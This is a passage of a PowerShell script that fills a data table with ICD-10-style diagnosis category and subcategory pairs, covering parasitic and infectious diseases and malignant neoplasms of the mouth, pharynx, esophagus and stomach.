disease","Chagas' disease (chronic) with heart involvement") + $null = $DiagnosisList.Rows.Add("Chagas' disease (chronic) with digestive system involvement","Chagas' disease with digestive system involvement, unspecified") + $null = $DiagnosisList.Rows.Add("Chagas' disease (chronic) with digestive system involvement","Megaesophagus in Chagas' disease") + $null = $DiagnosisList.Rows.Add("Chagas' disease (chronic) with digestive system involvement","Megacolon in Chagas' disease") + $null = $DiagnosisList.Rows.Add("Chagas' disease (chronic) with digestive system involvement","Other digestive system involvement in Chagas' disease") + $null = $DiagnosisList.Rows.Add("Chagas' disease (chronic) with nervous system involvement","Chagas' disease with nervous system involvement, unspecified") + $null = $DiagnosisList.Rows.Add("Chagas' disease (chronic) with nervous system involvement","Meningitis in Chagas' disease") + $null = $DiagnosisList.Rows.Add("Chagas' disease (chronic) with nervous system involvement","Meningoencephalitis in Chagas' disease") + $null = $DiagnosisList.Rows.Add("Chagas' disease (chronic) with nervous system involvement","Other nervous system involvement in Chagas' disease") + $null = $DiagnosisList.Rows.Add("Chagas' disease (chronic) with other organ involvement","Chagas' disease (chronic) with other organ involvement") + $null = $DiagnosisList.Rows.Add("Toxoplasma oculopathy","Toxoplasma oculopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Toxoplasma oculopathy","Toxoplasma chorioretinitis") + $null = $DiagnosisList.Rows.Add("Toxoplasma oculopathy","Other toxoplasma oculopathy") + $null = $DiagnosisList.Rows.Add("Toxoplasma hepatitis","Toxoplasma hepatitis") + $null = $DiagnosisList.Rows.Add("Toxoplasma meningoencephalitis","Toxoplasma meningoencephalitis") + $null = $DiagnosisList.Rows.Add("Pulmonary toxoplasmosis","Pulmonary toxoplasmosis") + $null = $DiagnosisList.Rows.Add("Toxoplasmosis with other organ involvement","Toxoplasma myocarditis") + $null = $DiagnosisList.Rows.Add("Toxoplasmosis with other organ involvement","Toxoplasma myositis") + $null = $DiagnosisList.Rows.Add("Toxoplasmosis with other organ involvement","Toxoplasma tubulo-interstitial nephropathy") + $null = $DiagnosisList.Rows.Add("Toxoplasmosis with other organ involvement","Toxoplasmosis with other organ involvement") + $null = $DiagnosisList.Rows.Add("Toxoplasmosis, unspecified","Toxoplasmosis, unspecified") + $null = $DiagnosisList.Rows.Add("Pneumocystosis","Pneumocystosis") + $null = $DiagnosisList.Rows.Add("Other protozoal diseases, not elsewhere classified","Babesiosis") + $null = $DiagnosisList.Rows.Add("Acanthamebiasis","Acanthamebiasis, unspecified") + $null = $DiagnosisList.Rows.Add("Acanthamebiasis","Meningoencephalitis due to Acanthamoeba (culbertsoni)") + $null = $DiagnosisList.Rows.Add("Acanthamebiasis","Conjunctivitis due to Acanthamoeba") + $null = $DiagnosisList.Rows.Add("Acanthamebiasis","Keratoconjunctivitis due to Acanthamoeba") + $null = $DiagnosisList.Rows.Add("Acanthamebiasis","Other acanthamebic disease") + $null = $DiagnosisList.Rows.Add("Naegleriasis","Naegleriasis") + $null = $DiagnosisList.Rows.Add("Other specified protozoal diseases","Other specified protozoal diseases") + $null = $DiagnosisList.Rows.Add("Unspecified protozoal disease","Unspecified protozoal disease") + $null = $DiagnosisList.Rows.Add("Schistosomiasis [bilharziasis]","Schistosomiasis due to Schistosoma haematobium [urinary schistosomiasis]") + $null = $DiagnosisList.Rows.Add("Schistosomiasis [bilharziasis]","Schistosomiasis due to Schistosoma mansoni [intestinal schistosomiasis]") + $null = $DiagnosisList.Rows.Add("Schistosomiasis [bilharziasis]","Schistosomiasis due to Schistosoma japonicum") + $null = $DiagnosisList.Rows.Add("Schistosomiasis [bilharziasis]","Cercarial dermatitis") + $null = $DiagnosisList.Rows.Add("Schistosomiasis [bilharziasis]","Other schistosomiasis") + $null = $DiagnosisList.Rows.Add("Schistosomiasis [bilharziasis]","Schistosomiasis, unspecified") + $null = $DiagnosisList.Rows.Add("Other fluke infections","Opisthorchiasis") + $null = $DiagnosisList.Rows.Add("Other fluke infections","Clonorchiasis") + $null = $DiagnosisList.Rows.Add("Other fluke infections","Dicroceliasis") + $null = $DiagnosisList.Rows.Add("Other fluke infections","Fascioliasis") + $null = $DiagnosisList.Rows.Add("Other fluke infections","Paragonimiasis") + $null = $DiagnosisList.Rows.Add("Other fluke infections","Fasciolopsiasis") + $null = $DiagnosisList.Rows.Add("Other fluke infections","Other specified fluke infections") + $null = $DiagnosisList.Rows.Add("Other fluke infections","Fluke infection, unspecified") + $null = $DiagnosisList.Rows.Add("Echinococcosis","Echinococcus granulosus infection of liver") + $null = $DiagnosisList.Rows.Add("Echinococcosis","Echinococcus granulosus infection of lung") + $null = $DiagnosisList.Rows.Add("Echinococcosis","Echinococcus granulosus infection of bone") + $null = $DiagnosisList.Rows.Add("Echinococcus granulosus infection, other and multiple sites","Echinococcus granulosus infection, thyroid gland") + $null = $DiagnosisList.Rows.Add("Echinococcus granulosus infection, other and multiple sites","Echinococcus granulosus infection, multiple sites") + $null = $DiagnosisList.Rows.Add("Echinococcus granulosus infection, other and multiple sites","Echinococcus granulosus infection, other sites") + $null = $DiagnosisList.Rows.Add("Echinococcus granulosus infection, unspecified","Echinococcus granulosus infection, unspecified") + $null = $DiagnosisList.Rows.Add("Echinococcus multilocularis infection of liver","Echinococcus multilocularis infection of liver") + $null = $DiagnosisList.Rows.Add("Echinococcus multilocularis infection, other and multiple sites","Echinococcus multilocularis infection, multiple sites") + $null = $DiagnosisList.Rows.Add("Echinococcus multilocularis infection, other and multiple sites","Echinococcus multilocularis infection, other sites") + $null = $DiagnosisList.Rows.Add("Echinococcus multilocularis infection, unspecified","Echinococcus multilocularis infection, unspecified") + $null = $DiagnosisList.Rows.Add("Echinococcosis, unspecified, of liver","Echinococcosis, unspecified, of liver") + $null = $DiagnosisList.Rows.Add("Echinococcosis, other and unspecified","Echinococcosis, unspecified") + $null = $DiagnosisList.Rows.Add("Echinococcosis, other and unspecified","Other echinococcosis") + $null = $DiagnosisList.Rows.Add("Taeniasis","Taenia solium taeniasis") + $null = $DiagnosisList.Rows.Add("Taeniasis","Taenia saginata taeniasis") + $null = $DiagnosisList.Rows.Add("Taeniasis","Taeniasis, unspecified") + $null = $DiagnosisList.Rows.Add("Cysticercosis","Cysticercosis of central nervous system") + $null = $DiagnosisList.Rows.Add("Cysticercosis","Cysticercosis of eye") + $null = $DiagnosisList.Rows.Add("Cysticercosis of other sites","Myositis in cysticercosis") + $null = $DiagnosisList.Rows.Add("Cysticercosis of other sites","Cysticercosis of other sites") + $null = $DiagnosisList.Rows.Add("Cysticercosis, unspecified","Cysticercosis, unspecified") + $null = $DiagnosisList.Rows.Add("Diphyllobothriasis and sparganosis","Diphyllobothriasis") + $null = $DiagnosisList.Rows.Add("Diphyllobothriasis and sparganosis","Sparganosis") + $null = $DiagnosisList.Rows.Add("Other cestode infections","Hymenolepiasis") + $null = $DiagnosisList.Rows.Add("Other cestode infections","Dipylidiasis") + $null = $DiagnosisList.Rows.Add("Other cestode infections","Other specified cestode infections") + $null = $DiagnosisList.Rows.Add("Other cestode infections","Cestode infection, unspecified") + $null = $DiagnosisList.Rows.Add("Dracunculiasis","Dracunculiasis") + $null = $DiagnosisList.Rows.Add("Onchocerciasis with eye disease","Onchocerciasis with eye involvement, unspecified") + $null = $DiagnosisList.Rows.Add("Onchocerciasis with eye disease","Onchocerciasis with endophthalmitis") + $null = $DiagnosisList.Rows.Add("Onchocerciasis with eye disease","Onchocerciasis with glaucoma") + $null = $DiagnosisList.Rows.Add("Onchocerciasis with eye disease","Onchocerciasis with other eye involvement") + $null = $DiagnosisList.Rows.Add("Onchocerciasis without eye disease","Onchocerciasis without eye disease") + $null = $DiagnosisList.Rows.Add("Filariasis","Filariasis due to Wuchereria bancrofti") + $null = $DiagnosisList.Rows.Add("Filariasis","Filariasis due to Brugia malayi") + $null = $DiagnosisList.Rows.Add("Filariasis","Filariasis due to Brugia timori") + $null = $DiagnosisList.Rows.Add("Filariasis","Loiasis") + $null = $DiagnosisList.Rows.Add("Filariasis","Mansonelliasis") + $null = $DiagnosisList.Rows.Add("Filariasis","Other filariases") + $null = $DiagnosisList.Rows.Add("Filariasis","Filariasis, unspecified") + $null = $DiagnosisList.Rows.Add("Trichinellosis","Trichinellosis") + $null = $DiagnosisList.Rows.Add("Hookworm diseases","Ancylostomiasis") + $null = $DiagnosisList.Rows.Add("Hookworm diseases","Necatoriasis") + $null = $DiagnosisList.Rows.Add("Hookworm diseases","Other hookworm diseases") + $null = $DiagnosisList.Rows.Add("Hookworm diseases","Hookworm disease, unspecified") + $null = $DiagnosisList.Rows.Add("Ascariasis","Ascariasis with intestinal complications") + $null = $DiagnosisList.Rows.Add("Ascariasis with other complications","Ascariasis pneumonia") + $null = $DiagnosisList.Rows.Add("Ascariasis with other complications","Ascariasis with other complications") + $null = $DiagnosisList.Rows.Add("Ascariasis, unspecified","Ascariasis, unspecified") + $null = $DiagnosisList.Rows.Add("Strongyloidiasis","Intestinal strongyloidiasis") + $null = $DiagnosisList.Rows.Add("Strongyloidiasis","Cutaneous strongyloidiasis") + $null = $DiagnosisList.Rows.Add("Strongyloidiasis","Disseminated strongyloidiasis") + $null = $DiagnosisList.Rows.Add("Strongyloidiasis","Strongyloidiasis, unspecified") + $null = $DiagnosisList.Rows.Add("Trichuriasis","Trichuriasis") + $null = $DiagnosisList.Rows.Add("Enterobiasis","Enterobiasis") + $null = $DiagnosisList.Rows.Add("Other intestinal helminthiases, not elsewhere classified","Anisakiasis") + $null = $DiagnosisList.Rows.Add("Other intestinal helminthiases, not elsewhere classified","Intestinal capillariasis") + $null = $DiagnosisList.Rows.Add("Other intestinal helminthiases, not elsewhere classified","Trichostrongyliasis") + $null = $DiagnosisList.Rows.Add("Other intestinal helminthiases, not elsewhere classified","Intestinal angiostrongyliasis") + $null = $DiagnosisList.Rows.Add("Other intestinal helminthiases, not elsewhere classified","Mixed intestinal helminthiases") + $null = $DiagnosisList.Rows.Add("Other intestinal helminthiases, not elsewhere classified","Other specified intestinal helminthiases") + $null = $DiagnosisList.Rows.Add("Unspecified intestinal parasitism","Intestinal helminthiasis, unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified intestinal parasitism","Intestinal parasitism, unspecified") + $null = $DiagnosisList.Rows.Add("Other helminthiases","Visceral larva migrans") + $null = $DiagnosisList.Rows.Add("Other helminthiases","Gnathostomiasis") + $null = $DiagnosisList.Rows.Add("Other helminthiases","Angiostrongyliasis due to Parastrongylus cantonensis") + $null = $DiagnosisList.Rows.Add("Other helminthiases","Syngamiasis") + $null = $DiagnosisList.Rows.Add("Other helminthiases","Internal hirudiniasis") + $null = $DiagnosisList.Rows.Add("Other helminthiases","Other specified helminthiases") + $null = $DiagnosisList.Rows.Add("Other helminthiases","Helminthiasis, unspecified") + $null = $DiagnosisList.Rows.Add("Pediculosis and phthiriasis","Pediculosis due to Pediculus humanus capitis") + $null = $DiagnosisList.Rows.Add("Pediculosis and phthiriasis","Pediculosis due to Pediculus humanus corporis") + $null = $DiagnosisList.Rows.Add("Pediculosis and phthiriasis","Pediculosis, unspecified") + $null = $DiagnosisList.Rows.Add("Pediculosis and phthiriasis","Phthiriasis") + $null = $DiagnosisList.Rows.Add("Pediculosis and phthiriasis","Mixed pediculosis and phthiriasis") + $null = $DiagnosisList.Rows.Add("Scabies","Scabies") + $null = $DiagnosisList.Rows.Add("Myiasis","Cutaneous myiasis") + $null = $DiagnosisList.Rows.Add("Myiasis","Wound myiasis") + $null = $DiagnosisList.Rows.Add("Myiasis","Ocular myiasis") + $null = $DiagnosisList.Rows.Add("Myiasis","Nasopharyngeal myiasis") + $null = $DiagnosisList.Rows.Add("Myiasis","Aural myiasis") + $null = $DiagnosisList.Rows.Add("Myiasis of other sites","Genitourinary myiasis") + $null = $DiagnosisList.Rows.Add("Myiasis of other sites","Intestinal myiasis") + $null = $DiagnosisList.Rows.Add("Myiasis of other sites","Myiasis of other sites") + $null = $DiagnosisList.Rows.Add("Myiasis, unspecified","Myiasis, unspecified") + $null = $DiagnosisList.Rows.Add("Other infestations","Other acariasis") + $null = $DiagnosisList.Rows.Add("Other infestations","Tungiasis [sandflea infestation]") + $null = $DiagnosisList.Rows.Add("Other infestations","Other arthropod infestations") + $null = $DiagnosisList.Rows.Add("Other infestations","External hirudiniasis") + $null = $DiagnosisList.Rows.Add("Other infestations","Other specified infestations") + $null = $DiagnosisList.Rows.Add("Other infestations","Infestation, unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified parasitic disease","Unspecified parasitic disease") + $null = $DiagnosisList.Rows.Add("Sequelae of tuberculosis","Sequelae of central nervous system tuberculosis") + $null = $DiagnosisList.Rows.Add("Sequelae of tuberculosis","Sequelae of genitourinary tuberculosis") + $null = $DiagnosisList.Rows.Add("Sequelae of tuberculosis","Sequelae of tuberculosis of bones and joints") + $null = $DiagnosisList.Rows.Add("Sequelae of tuberculosis","Sequelae of tuberculosis of other organs") + $null = $DiagnosisList.Rows.Add("Sequelae of tuberculosis","Sequelae of respiratory and unspecified tuberculosis") + $null = $DiagnosisList.Rows.Add("Sequelae of poliomyelitis","Sequelae of poliomyelitis") + $null = $DiagnosisList.Rows.Add("Sequelae of leprosy","Sequelae of leprosy") + $null = $DiagnosisList.Rows.Add("Sequelae of other and unspecified infectious and parasitic diseases","Sequelae of trachoma") + $null = $DiagnosisList.Rows.Add("Sequelae of other and unspecified infectious and parasitic diseases","Sequelae of viral encephalitis") + $null = $DiagnosisList.Rows.Add("Sequelae of other and unspecified infectious and parasitic diseases","Sequelae of viral hepatitis") + $null = $DiagnosisList.Rows.Add("Sequelae of other and unspecified infectious and parasitic diseases","Sequelae of other specified infectious and parasitic diseases") + $null = $DiagnosisList.Rows.Add("Sequelae of other and unspecified infectious and parasitic diseases","Sequelae of unspecified infectious and parasitic disease") + $null = $DiagnosisList.Rows.Add("Streptococcus, Staphylococcus, and Enterococcus as the cause of diseases classified elsewhere","Streptococcus, group A, as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Streptococcus, Staphylococcus, and Enterococcus as the cause of diseases classified elsewhere","Streptococcus, group B, as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Streptococcus, Staphylococcus, and Enterococcus as the cause of diseases classified elsewhere","Enterococcus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Streptococcus, Staphylococcus, and Enterococcus as the cause of diseases classified elsewhere","Streptococcus pneumoniae as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Streptococcus, Staphylococcus, and Enterococcus as the cause of diseases classified elsewhere","Other streptococcus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Streptococcus, Staphylococcus, and Enterococcus as the cause of diseases classified elsewhere","Unspecified streptococcus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Staphylococcus aureus as the cause of diseases classified elsewhere","Methicillin susceptible Staphylococcus aureus infection as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Staphylococcus aureus as the cause of diseases classified elsewhere","Methicillin resistant Staphylococcus aureus infection as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other staphylococcus as the cause of diseases classified elsewhere","Other staphylococcus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Unspecified staphylococcus as the cause of diseases classified elsewhere","Unspecified staphylococcus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other bacterial agents as the cause of diseases classified elsewhere","Mycoplasma pneumoniae [M. pneumoniae] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other bacterial agents as the cause of diseases classified elsewhere","Klebsiella pneumoniae [K. pneumoniae] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Escherichia coli [E. coli ] as the cause of diseases classified elsewhere","Unspecified Escherichia coli [E. coli] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Escherichia coli [E. coli ] as the cause of diseases classified elsewhere","Shiga toxin-producing Escherichia coli [E. coli] (STEC) O157 as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Escherichia coli [E. coli ] as the cause of diseases classified elsewhere","Other specified Shiga toxin-producing Escherichia coli [E. coli] (STEC) as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Escherichia coli [E. coli ] as the cause of diseases classified elsewhere","Unspecified Shiga toxin-producing Escherichia coli [E. coli] (STEC) as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Escherichia coli [E. coli ] as the cause of diseases classified elsewhere","Other Escherichia coli [E. coli] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Hemophilus influenzae [H. influenzae] as the cause of diseases classified elsewhere","Hemophilus influenzae [H. influenzae] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Proteus (mirabilis) (morganii) as the cause of diseases classified elsewhere","Proteus (mirabilis) (morganii) as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Pseudomonas (aeruginosa) (mallei) (pseudomallei) as the cause of diseases classified elsewhere","Pseudomonas (aeruginosa) (mallei) (pseudomallei) as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Bacteroides fragilis [B. fragilis] as the cause of diseases classified elsewhere","Bacteroides fragilis [B. fragilis] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Clostridium perfringens [C. perfringens] as the cause of diseases classified elsewhere","Clostridium perfringens [C. perfringens] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified bacterial agents as the cause of diseases classified elsewhere","Helicobacter pylori [H. pylori] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified bacterial agents as the cause of diseases classified elsewhere","Vibrio vulnificus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified bacterial agents as the cause of diseases classified elsewhere","Other specified bacterial agents as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Viral agents as the cause of diseases classified elsewhere","Adenovirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Enterovirus as the cause of diseases classified elsewhere","Unspecified enterovirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Enterovirus as the cause of diseases classified elsewhere","Coxsackievirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Enterovirus as the cause of diseases classified elsewhere","Echovirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Enterovirus as the cause of diseases classified elsewhere","Other enterovirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Coronavirus as the cause of diseases classified elsewhere","SARS-associated coronavirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Coronavirus as the cause of diseases classified elsewhere","Other coronavirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Retrovirus as the cause of diseases classified elsewhere","Unspecified retrovirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Retrovirus as the cause of diseases classified elsewhere","Lentivirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Retrovirus as the cause of diseases classified elsewhere","Oncovirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Retrovirus as the cause of diseases classified elsewhere","Human T-cell lymphotrophic virus, type I [HTLV-I] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Retrovirus as the cause of diseases classified elsewhere","Human T-cell lymphotrophic virus, type II [HTLV-II] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Retrovirus as the cause of diseases classified elsewhere","Human immunodeficiency virus, type 2 [HIV 2] as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Retrovirus as the cause of diseases classified elsewhere","Other retrovirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Respiratory syncytial virus as the cause of diseases classified elsewhere","Respiratory syncytial virus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Reovirus as the cause of diseases classified elsewhere","Reovirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Parvovirus as the cause of diseases classified elsewhere","Parvovirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Papillomavirus as the cause of diseases classified elsewhere","Papillomavirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other viral agents as the cause of diseases classified elsewhere","Human metapneumovirus as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other viral agents as the cause of diseases classified elsewhere","Other viral agents as the cause of diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other and unspecified infectious diseases","Other infectious disease") + $null = $DiagnosisList.Rows.Add("Other and unspecified infectious diseases","Unspecified infectious disease") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lip","Malignant neoplasm of external upper lip") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lip","Malignant neoplasm of external lower lip") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lip","Malignant neoplasm of external lip, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lip","Malignant neoplasm of upper lip, inner aspect") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lip","Malignant neoplasm of lower lip, inner aspect") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lip","Malignant neoplasm of lip, unspecified, inner aspect") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lip","Malignant neoplasm of commissure of lip, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lip","Malignant neoplasm of overlapping sites of lip") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lip","Malignant neoplasm of lip, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of base of tongue","Malignant neoplasm of base of tongue") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of tongue","Malignant neoplasm of dorsal surface of tongue") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of tongue","Malignant neoplasm of border of tongue") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of tongue","Malignant neoplasm of ventral surface of tongue") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of tongue","Malignant neoplasm of anterior two-thirds of tongue, part unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of tongue","Malignant neoplasm of lingual tonsil") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of tongue","Malignant neoplasm of overlapping sites of tongue") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of tongue","Malignant neoplasm of tongue, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of gum","Malignant neoplasm of upper gum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of gum","Malignant neoplasm of lower gum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of gum","Malignant neoplasm of gum, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of floor of mouth","Malignant neoplasm of anterior floor of mouth") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of floor of mouth","Malignant neoplasm of lateral floor of mouth") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of floor of mouth","Malignant neoplasm of overlapping sites of floor of mouth") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of floor of mouth","Malignant neoplasm of floor of mouth, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of palate","Malignant neoplasm of hard palate") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of palate","Malignant neoplasm of soft palate") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of palate","Malignant neoplasm of uvula") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of palate","Malignant neoplasm of overlapping sites of palate") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of palate","Malignant neoplasm of palate, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of mouth","Malignant neoplasm of cheek mucosa") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of mouth","Malignant neoplasm of vestibule of mouth") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of mouth","Malignant neoplasm of retromolar area") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of other and unspecified parts of mouth","Malignant neoplasm of overlapping sites of unspecified parts of mouth") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of other and unspecified parts of mouth","Malignant neoplasm of overlapping sites of other parts of mouth") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of mouth, unspecified","Malignant neoplasm of mouth, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of parotid gland","Malignant neoplasm of parotid gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified major salivary glands","Malignant neoplasm of submandibular gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified major salivary glands","Malignant neoplasm of sublingual gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified major salivary glands","Malignant neoplasm of major salivary gland, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of tonsil","Malignant neoplasm of tonsillar fossa") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of tonsil","Malignant neoplasm of tonsillar pillar (anterior) (posterior)") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of tonsil","Malignant neoplasm of overlapping sites of tonsil") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of tonsil","Malignant neoplasm of tonsil, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of oropharynx","Malignant neoplasm of vallecula") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of oropharynx","Malignant neoplasm of anterior surface of epiglottis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of oropharynx","Malignant neoplasm of lateral wall of oropharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of oropharynx","Malignant neoplasm of posterior wall of oropharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of oropharynx","Malignant neoplasm of branchial cleft") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of oropharynx","Malignant neoplasm of overlapping sites of oropharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of oropharynx","Malignant neoplasm of oropharynx, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nasopharynx","Malignant neoplasm of superior wall of nasopharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nasopharynx","Malignant neoplasm of posterior wall of nasopharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nasopharynx","Malignant neoplasm of lateral wall of nasopharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nasopharynx","Malignant neoplasm of anterior wall of nasopharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nasopharynx","Malignant neoplasm of overlapping sites of nasopharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nasopharynx","Malignant neoplasm of nasopharynx, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of pyriform sinus","Malignant neoplasm of pyriform sinus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of hypopharynx","Malignant neoplasm of postcricoid region") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of hypopharynx","Malignant neoplasm of aryepiglottic fold, hypopharyngeal aspect") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of hypopharynx","Malignant neoplasm of posterior wall of hypopharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of hypopharynx","Malignant neoplasm of overlapping sites of hypopharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of hypopharynx","Malignant neoplasm of hypopharynx, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined sites in the lip, oral cavity and pharynx","Malignant neoplasm of pharynx, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined sites in the lip, oral cavity and pharynx","Malignant neoplasm of Waldeyer's ring") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined sites in the lip, oral cavity and pharynx","Malignant neoplasm of overlapping sites of lip, oral cavity and pharynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of esophagus","Malignant neoplasm of upper third of esophagus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of esophagus","Malignant neoplasm of middle third of esophagus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of esophagus","Malignant neoplasm of lower third of esophagus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of esophagus","Malignant neoplasm of overlapping sites of esophagus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of esophagus","Malignant neoplasm of esophagus, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of stomach","Malignant neoplasm of cardia") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of stomach","Malignant neoplasm of fundus of stomach") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of stomach","Malignant neoplasm of body of stomach") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of stomach","Malignant neoplasm of pyloric antrum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of stomach","Malignant neoplasm of pylorus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of stomach","Malignant neoplasm of lesser curvature of stomach, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of stomach","Malignant neoplasm of greater curvature of stomach, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of stomach","Malignant neoplasm of overlapping sites of stomach") + $null = 